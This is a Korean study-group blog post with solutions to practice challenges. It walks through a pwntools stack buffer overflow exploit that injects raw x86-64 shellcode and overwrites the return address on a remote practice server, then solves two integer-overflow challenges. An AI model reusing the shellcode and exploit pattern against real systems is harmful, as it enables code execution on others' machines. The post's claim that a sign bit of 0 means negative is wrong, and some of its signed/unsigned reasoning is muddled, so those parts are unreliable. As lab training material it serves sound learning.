estherseo
JINIWAY
estherseo
์ „์ฒด ๋ฐฉ๋ฌธ์ž
์˜ค๋Š˜
์–ด์ œ
  • ๋ถ„๋ฅ˜ ์ „์ฒด๋ณด๊ธฐ
    • ์ „๊ณต๊ณต๋ถ€
    • CS
      • Network
      • Algorithm
      • ๐Ÿ“–
      • python
      • django
    • Pentest
      • ๐Ÿ“–
      • HTB
      • Machines
    • Web-hacking
      • ๐Ÿ“–
      • Dreamhack
      • Portswigger
    • System-hacking
      • ๐Ÿ“–
    • Mobile-hacking
    • Project
    • CVE
    • CTF
    • News & Conference
    • ์ž๊ฒฉ์ฆ
    • ์‹ ๊ธฐ์ˆ 
      • AI

๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

  • ํ™ˆ
  • ํƒœ๊ทธ
  • ๋ฐฉ๋ช…๋ก
  • ๋ธ”๋กœ๊ทธ ์†Œ๊ฐœ

์ธ๊ธฐ ๊ธ€

์ตœ๊ทผ ๋Œ“๊ธ€

์ตœ๊ทผ ๊ธ€

ํƒœ๊ทธ

  • ๋‹คํฌ์›น ๋ชจ๋‹ˆํ„ฐ๋ง
  • ์‹œ์Šคํ…œํ•ดํ‚น๊ณต๋ถ€
  • ํŒจํ‚ท์žก๊ธฐ
  • asc
  • ํ™”์ดํŠธํ–‡ํˆฌ๊ฒŒ๋”1๊ธฐ
  • 2022 ๋„คํŠธ์›Œํฌ๊ด€๋ฆฌ์‚ฌ
  • ํ™”์ดํŠธํ–‡ํˆฌ๊ฒŒ๋”
  • ASC ์Šคํ„ฐ๋””
  • ASC์Šคํ„ฐ๋””
  • ๋„คํŠธ์›Œํฌ๊ด€๋ฆฌ์‚ฌ ์‹ค๊ธฐ ํ•ฉ๊ฒฉ
  • ๋‹คํฌ์›น ๋ชจ๋‹ˆํ„ฐ๋ง ์„œ๋น„์Šค
  • HTB valentine
  • integer overflow
  • CVE-2022-22817
  • jwt token last character
  • ๊ธฐ์‚ฌ์š”์•ฝ
  • ํ™”์ดํŠธํ–‡ํˆฌ๊ฒŒ๋”1๊ธฐ ๊ฒฐ๊ณผ๊ณต์œ ํšŒ
  • 2022 pox
  • ์„ธ๊ณ„์‹ ์•ˆ๋ณดํฌ๋Ÿผ
  • python eval
  • n00bCTF
  • shocker
  • ์…ธ์‡ผํฌ
  • CTF๊ณต๋ถ€
  • ์‹œ์Šคํ…œํ•ดํ‚น ์Šคํ„ฐ๋””
  • Pillow์ทจ์•ฝ์ 
  • ์Šคํƒ์นด๋‚˜๋ฆฌ
  • ์ค‘์†Œ๊ธฐ์—… ์ •๋ณด๋ณดํ˜ธ
  • HTB shocker
  • pox2022
hELLO ยท Designed By ์ •์ƒ์šฐ.
estherseo

JINIWAY

[ASC ์Šคํ„ฐ๋””] 7์ฃผ์ฐจ - Stack Buffer Overflow ๋ฌธ์ œ ํ’€์ด, Integer Overflow
System-hacking/๐Ÿ“–

[ASC ์Šคํ„ฐ๋””] 7์ฃผ์ฐจ - Stack Buffer Overflow ๋ฌธ์ œ ํ’€์ด, Integer Overflow

2022. 7. 30. 02:04

๐Ÿ‘‰ ์ง€๋‚œ ์ฐจ์‹œ

2022.07.23 - [System-hacking/๐Ÿ“–] - [ASC ์Šคํ„ฐ๋””] 6์ฃผ์ฐจ - ํ•จ์ˆ˜์˜ ์Šคํƒ ํ”„๋ ˆ์ž„, ๋ฉ”๋ชจ๋ฆฌ ๋ณดํ˜ธ๊ธฐ๋ฒ•, Stack Buffer Overflow

 

1. Stack Buffer Overflow ์‹ค์Šต ๋ฌธ์ œ ํ’€์ด

๋ฌธ์ œ ํ’€์ด1 : overwrite_ret64

๋ณดํ˜ธ๊ธฐ๋ฒ• X
IDA

 

์ •์ƒ ์‹คํ–‰ ๋™์ž‘

์‹คํ–‰ํ•  ๋•Œ๋งˆ๋‹ค ๋ฒ„ํผ์˜ ์ฃผ์†Œ๊ฐ€ ๋ฐ”๋€Œ๊ณ  ์žˆ๋‹ค => ASLR

์ทจ์•ฝํ•œ ๋ถ€๋ถ„ : scanf๋กœ ์ž…๋ ฅ์„ ๋ฐ›๋Š”๋ฐ ํฌ๊ธฐ ์ œํ•œ์„ ํ•˜์ง€ ์•Š๊ณ  ์žˆ๋‹ค.

 

* ํ’€์ด ์ˆœ์„œ

1. buf์˜ ์ฃผ์†Œ๋ฅผ ๊ฐ€์ ธ์˜จ๋‹ค. -

2. size๋ฅผ int์˜ 4๋ฐ”์ดํŠธ๋งŒํผ ์ž…๋ ฅํ•œ๋‹ค.

3. Input์—์„œ ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๋ฅผ ์ด์šฉํ•ด ์‰˜์ฝ”๋“œ๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค.

 

pwntools์„ ์ด์šฉํ•ด์„œ ์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ๋ฅผ ์งœ๋ณด์ž.

 

1. buf์˜ ์ฃผ์†Œ๋ฅผ ๊ฐ€์ ธ์˜จ๋‹ค.

p.recvuntil(b'buf address : ')
buf_address = int(p.recvline().strip(), 16)

2. size ์ž…๋ ฅ

p.sendlineafter(b'size : ', b'1000')

3. ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ 

- payload ๊ตฌ์„ฑ : 

64๋น„ํŠธ ํ™˜๊ฒฝ ์‰˜์ฝ”๋“œ

๋ฒ„ํผ 256byte๋งŒํผ ๋‚˜๋จธ์ง€ ๊ณต๊ฐ„์„ A๋กœ ์ฑ„์šฐ๊ธฐ

sfp 8byte๋งŒํผ B๋กœ ์ฑ„์šฐ๊ธฐ

ret๋ฅผ ๋ฒ„ํผ์˜ ์‹œ์ž‘ ์ฃผ์†Œ๋กœ ๋ฎ๊ธฐ

payload = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
payload += b'A'*(256-len(payload))
payload += b'B'*8
payload += p64(buf_address)

pause()
p.sendafter(b'Input : ', payload)

 

์ตœ์ข… ์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ

from pwn import *

context.log_level="debug"
e = ELF('./overwrite_ret64')
p = remote('141.164.39.45', 10006)

p.recvuntil(b'buf address : ')
buf_address = int(p.recvline().strip(), 16)
print(hex(buf_address))

p.sendlineafter(b'size : ', b'1000')

payload = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
payload += b'A'*(256-len(payload))
payload += b'B'*8
payload += p64(buf_address)

pause()
p.sendafter(b'Input : ', payload)

p.interactive()

๋น„์Šทํ•œ ๋ฌธ์ œ๋“ค : ๋“œ๋ฆผํ•ต basic_exploitation_000, basic_exploitation_001

 

2. Integer Overflow

intํ˜•์€ 4Byte, 32bit ์ด๋‹ค.

 

ํ‘œํ˜„ํ•  ์ˆ˜ ์žˆ๋Š” ๋ฒ”์œ„ :

00000000 00000000 00000000 00000000(32) ~ 11111111 11111111 11111111 11111111(32)

 

์ตœ์ƒ์œ„ ๋น„ํŠธ(MSB)๋Š” ์Œ์ˆ˜๋ฅผ ๊ตฌ๋ถ„ํ•˜๊ธฐ ์œ„ํ•ด์„œ ์‚ฌ์šฉํ•œ๋‹ค. 0์ด๋ฉด ์Œ์ˆ˜, 1์ด๋ฉด ์–‘์ˆ˜์ด๋‹ค.

 

๊ทธ๋ž˜์„œ ๋‚˜ํƒ€๋‚ผ ์ˆ˜ ์žˆ๋Š” int์˜ ์ตœ๋Œ“๊ฐ’์€,

01111111 11111111 11111111 11111111 = 2,147,483,647 ์ด๊ณ 

์—ฌ๊ธฐ์„œ 1์„ ๋”ํ•˜๋ฉด,

1 00000000 00000000 00000000 00000000 = -2,147,483,648 ์ด๋‹ค.

 

 

์ฆ‰ integer overflow ๋ž€ ์ €์žฅํ•  ์ˆ˜ ์žˆ๋Š” ๋ฒ”์œ„๋ฅผ ๋„˜์–ด์„œ ๋” ํฐ ๊ฐ’์„ ์ €์žฅํ•˜๋ ค ํ•  ๋•Œ ์‹ค์ œ ์ €์žฅ๋˜๋Š” ๊ฐ’์ด ์˜๋„์น˜ ์•Š๊ฒŒ ์•„์ฃผ ์ž‘์€ ์ˆ˜๋‚˜ ์Œ์ˆ˜๊ฐ€ ๋  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์ ์ด๋‹ค.

 

๋Œ€์ฑ… :

์–ธ์–ด/ํ”Œ๋žซํผ๋ณ„ ์ •์ˆ˜ ํƒ€์ž…์˜ ๋ฒ”์œ„๋ฅผ ํ™•์ธํ•˜์—ฌ ์‚ฌ์šฉํ•œ๋‹ค.

๊ฒฐ๊ณผ๊ฐ’์˜ ๋ฒ”์œ„๋ฅผ ์ฒดํฌํ•˜๋Š” ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•œ๋‹ค.

 

๋ฌธ์ œ ํ’€์ด2 : integer_overflow

intํ˜•์ธ v4๋ฅผ ์ž…๋ ฅ๋ฐ›๊ณ 

v4+v5๊ฐ€ 256๋ณด๋‹ค ์ž‘์œผ๋ฉด get_flag()ํ•จ์ˆ˜๋ฅผ ํ˜ธ์ถœํ•  ์ˆ˜ ์žˆ๋‹ค.

 

v5๊ฐ€ 4096์ด๋‹ˆ๊นŒ

v4+v5=intํ˜• ์ตœ๋Œ“๊ฐ’ 2147483647 + 1 = > -2147483648(์Œ์ˆ˜๊ฐ’) ์ด ๋˜๋„๋ก ํ•ด์ฃผ๋ฉด ๋œ๋‹ค. 

 

v4๋ฅผ ๊ตฌํ•ด๋ณด์ž.

intํ˜• ์ตœ๋Œ“๊ฐ’ 2147483647 + 1 - 4096 =  v4

v4์— 2,147,479,552์„ ์ž…๋ ฅํ•ด์ฃผ๋ฉด ๋œ๋‹ค ! 

 

๋ฌธ์ œ ํ’€์ด3 : gambling

__int64 gambling()
{
  unsigned int v1; // [rsp+Ch] [rbp-14h] BYREF
  int v2; // [rsp+10h] [rbp-10h] BYREF
  int v3; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  v3 = 1000;
  make_random();
  puts("[chall] gambling");
  puts("Start Gambling!\n");
  while ( v3 >= 0 )
  {
    printf("current your money : %d\n\n", (unsigned int)v3);
    puts("bat your money");
    printf("bat money : ");
    __isoc99_scanf("%d", &v1);
    printf("choose lucky number : ");
    __isoc99_scanf("%d", &v2);
    printf("\nlucky number is %d\n", (unsigned int)win);
    if ( v2 == win )
    {
      printf("You Win! ");
      printf(" + %d money\n", v1);
      v3 += v1;
    }
    else
    {
      printf("You Lost! ");
      printf(" - %d money\n", v1);
      v3 -= v1;
    }
    make_random();
    if ( v3 > 9999999 )
    {
      puts("You are rich!!!!");
      return 1LL;
    }
  }
  puts("You are a beggar!");
  return 0LL;
}

flag๋ฅผ ์ฝ์œผ๋ ค๋ฉด gambling() ํ•จ์ˆ˜์˜ ๋ฆฌํ„ด๊ฐ’์„ ์–‘์ˆ˜๋กœ ๋งŒ๋“ค์–ด์•ผ ํ•˜๋Š”๋ฐ, 

v3์ด 9999999๋ณด๋‹ค ํด ๋•Œ 1์„ ๋ฆฌํ„ดํ•œ๋‹ค๊ณ  ํ•œ๋‹ค.

 

v3์€ ๋งจ ์ฒ˜์Œ ๋‚ด ๋ˆ์œผ๋กœ 1000์ด ๋“ค์–ด๊ฐ€์žˆ๋Š” intํ˜• ๋ณ€์ˆ˜์ด๋‹ค.

bat money์— ์ž…๋ ฅํ•œ ๊ฐ’, v1์„ v3์—์„œ ๋บ€๋‹ค.

์ด๊ฒƒ์„ ์ด์šฉํ•ด์„œ v3์„ ์•„์ฃผ ํฐ ๊ฐ’์œผ๋กœ ๋งŒ๋“ค์–ด์•ผ๊ฒ ๋‹ค.

 

v3 =  v3 - v1

๊ฐ„๋‹จํ•˜๊ฒŒ v1์— ์Œ์ˆ˜๋ฅผ ๋„ฃ์œผ๋ฉด ๋˜์ง€ ์•Š์„๊นŒ?

1000 - -9999999 = 10,000,999   > 9999999

๊ทผ๋ฐ v1์€ unsigned intํ˜• ๋ณ€์ˆ˜์ธ๋ฐ.. ์Œ์ˆ˜๊ฐ€ ์™œ ๋˜์ง€? ===> (์ถ”๊ฐ€) C์ฝ”๋“œ ์‚ดํŽด๋ณด๋ฉด ์ž…๋ ฅ์„ ๋ฐ›์„ ๋•Œ %ud๊ฐ€ ์•„๋‹Œ %d๋กœ ๋ฐ›์•„์ค˜์„œ ๊ทธ๋Ÿฐ๋“ฏ?

 

( integer overflow ์ด๋ก  ์ ์šฉํ•œ ํ’€์ด )

v3 - v1 > 9999999

1000 - v1 > 9999999

v1์— ์•„์ฃผ ํฐ ๊ฐ’์„ ๋„ฃ์–ด์„œ  intํ˜• ์ตœ์†Ÿ๊ฐ’์ธ -2147483648์— -1ํ•œ ๊ฐ’์„ ๋งŒ๋“ค๋ฉด ์–‘์ˆ˜๋กœ ๋ฐ”๋€Œ์ง€ ์•Š์„๊นŒ

1000 - 2147484649 = - 2147483649 = 2147483647 (intํ˜• ์ตœ๋Œ“๊ฐ’)

 

-2147483648 : intํ˜• ์ตœ์†Ÿ๊ฐ’

10000000 00000000 00000000 00000000

์—ฌ๊ธฐ์„œ 1์„ ๋นผ๋ฉด -2147483649์ธ๋ฐ 

10000000 00000000 00000000 00000001์˜ 2์˜ ๋ณด์ˆ˜ ์ทจํ•ด์„œ

01111111 11111111 11111111 11111111 = 2147483647 (intํ˜• ์ตœ๋Œ“๊ฐ’) ์ด ๋œ๋‹ค.

-2147483649 =>  2147483647(intํ˜• ์ตœ๋Œ“๊ฐ’) ์–‘์ˆ˜๋กœ ๋ฐ”๋€œ

 

v3 - v1 = -2147483649 = 2147483647 > 9999999

1000 + 2147483649 = v1 = 2147484649

 

c์–ธ์–ด ์ฝ”๋“œ ๋ณด๋‹ˆ๊นŒ v1์ด intํ˜•์ด์—ˆ๋‹ค..! ๊ทธ๋ž˜์„œ ์Œ์ˆ˜๊ฐ€ ๋๋‚˜๋ณด๋‹ค. ===> (์ถ”๊ฐ€) gdb๋กœ ์‚ดํŽด๋ณด๋ฉด v1์€ unsigned int๊ฐ€ ๋งž๊ธดํ•˜๋‹ค. 

 

โญ๊ณต๋ถ€ํ•  ๊ฒƒ๋“ค

1. ๋“œ๋ฆผํ•ต ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๋กœ๋“œ๋งต, ์›Œ๊ฒŒ์ž„๋“ค

 

 


ASC ์‹œ์Šคํ…œํ•ดํ‚น ์Šคํ„ฐ๋””

 

'System-hacking > ๐Ÿ“–' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[ASC ์Šคํ„ฐ๋””] 9์ฃผ์ฐจ - Return to Library(RTL)  (0) 2022.08.25
[ASC ์Šคํ„ฐ๋””] 8์ฃผ์ฐจ - Stack Canary + Out Of Boundary  (0) 2022.08.19
[ASC ์Šคํ„ฐ๋””] 6์ฃผ์ฐจ - ํ•จ์ˆ˜์˜ ์Šคํƒ ํ”„๋ ˆ์ž„, ๋ฉ”๋ชจ๋ฆฌ ๋ณดํ˜ธ๊ธฐ๋ฒ•, Stack Buffer Overflow  (0) 2022.07.23
[ASC ์Šคํ„ฐ๋””] 5์ฃผ์ฐจ - ์—ฐ์Šต๋ฌธ์ œ ํ’€์ด, GDB, IDA, Pwntools ์‚ฌ์šฉ๋ฒ•  (0) 2022.07.07
[ASC ์Šคํ„ฐ๋””] 4์ฃผ์ฐจ - ๋ ˆ์ง€์Šคํ„ฐ, ์–ด์…ˆ๋ธ”๋ฆฌ, ์—ฐ์Šต๋ฌธ์ œ, GDB ์‚ฌ์šฉ๋ฒ•  (0) 2022.06.27
    'System-hacking/๐Ÿ“–' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
    • [ASC ์Šคํ„ฐ๋””] 9์ฃผ์ฐจ - Return to Library(RTL)
    • [ASC ์Šคํ„ฐ๋””] 8์ฃผ์ฐจ - Stack Canary + Out Of Boundary
    • [ASC ์Šคํ„ฐ๋””] 6์ฃผ์ฐจ - ํ•จ์ˆ˜์˜ ์Šคํƒ ํ”„๋ ˆ์ž„, ๋ฉ”๋ชจ๋ฆฌ ๋ณดํ˜ธ๊ธฐ๋ฒ•, Stack Buffer Overflow
    • [ASC ์Šคํ„ฐ๋””] 5์ฃผ์ฐจ - ์—ฐ์Šต๋ฌธ์ œ ํ’€์ด, GDB, IDA, Pwntools ์‚ฌ์šฉ๋ฒ•
    estherseo
    estherseo
    ์•ˆ๋…•ํ•˜์„ธ์š”๐Ÿ˜€

    ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”